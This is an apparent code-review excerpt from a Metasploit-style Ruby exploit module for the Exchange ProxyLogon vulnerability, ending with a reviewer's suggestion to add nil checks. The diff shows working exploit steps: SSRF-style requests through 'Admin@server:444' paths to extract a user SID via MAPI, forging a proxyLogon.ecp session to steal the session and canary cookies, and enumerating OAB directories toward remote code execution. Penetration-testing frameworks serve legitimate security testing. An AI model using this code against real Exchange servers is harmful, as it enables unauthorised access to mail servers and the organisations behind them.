modules/exploits/windows/http/exchange_proxylogon_rce.rb

```diff
@@ -0,0 +1,465 @@
+
+    server = ''
+    xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|
+      type = item.at_xpath('./xmlns:Type', xmlns).content
+      if type == 'EXCH'
+        server = item.at_xpath('./xmlns:Server', xmlns).content
+      end
+    end
+    fail_with(Failure::Unknown, 'No \'Server ID\' was found') if server.empty?
+
+    [server, legacy_dn]
+  end
+
+  # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff
+  def request_mapi(server_name, legacy_dn, server_id)
+    data = "#{legacy_dn}\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"
+    headers = {
+      'X-Requesttype' => 'Connect',
+      'X-Requestid' => Rex::Text.rand_text_numeric(12..13).to_s,
+      'X-Clientapplication' => datastore['MapiClientApp']
+    }
+
+    sid = ''
+    response = send_http(
+      'POST',
+      "Admin@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~1942062522",
+      data,
+      'application/mapi-http',
+      headers
+    )
+    if response.code == 200
+      sid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/
+      sid = response.body.match(sid_regex)
+    end
+    fail_with(Failure::Unknown, 'No \'SID\' was found') if sid.to_s.empty?
+
+    sid
+  end
+
+  def request_oab(server_name, canary)
+    data = {
+      'filter': {
+        'Parameters': {
+          '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
+          'SelectedView': '',
+          'SelectedVDirType': 'OAB'
+        }
+      },
+      'sort': {}
+    }.to_json
+
+    response = send_http(
+      'POST',
+      "Admin@#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~1942062522",
+      data,
+      'application/json; charset=utf-8'
+    )
+
+    if response.code == 200
+      data = JSON.parse(response.body)
+      data['d']['Output'].each do |oab|
+        if oab['Server'].downcase == server_name.downcase
+          return [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']]
+        end
+      end
+    end
+
+    fail_with(Failure::Unknown, 'No \'OAB Id\' was found')
+  end
+
+  def resqest_proxylogon(server_name)
+    data = "<r at=\"Negotiate\" ln=\"#{rand_text_alpha(4..8)}\"><s>#{@sid}</s></r>"
+
+    session_id = ''
+    canary = ''
+
+    response = send_http(
+      'POST',
+      "Admin@#{server_name}:444/ecp/proxyLogon.ecp?a=~1942062522",
+      data,
+      'text/xml; charset=utf-8'
+    )
+    if response.code == 241
+      session_id = response.get_cookies.scan(/ASP\.NET_SessionId=([\w\-]+);/).flatten[0]
+      canary = response.get_cookies.scan(/msExchEcpCanary=([\w\-_.]+);*/).flatten[0] # coin coin coin ...
+    end
+    fail_with(Failure::Unknown, 'No \'ASP.NET_SessionId\' was found') if session_id.empty?
+    fail_with(Failure::Unknown, 'No \'msExchEcpCanary\' was found') if canary.empty?
```

Comment:
`session_id` and `canary` can be `nil` and calling `empty?` directly will result in a `NoMethodError` exception.
```suggestion
    fail_with(Failure::Unknown, 'No \'ASP.NET_SessionId\' was found') if session_id.nil? || session_id.empty?
    fail_with(Failure::Unknown, 'No \'msExchEcpCanary\' was found') if canary.nil? || canary.empty?
```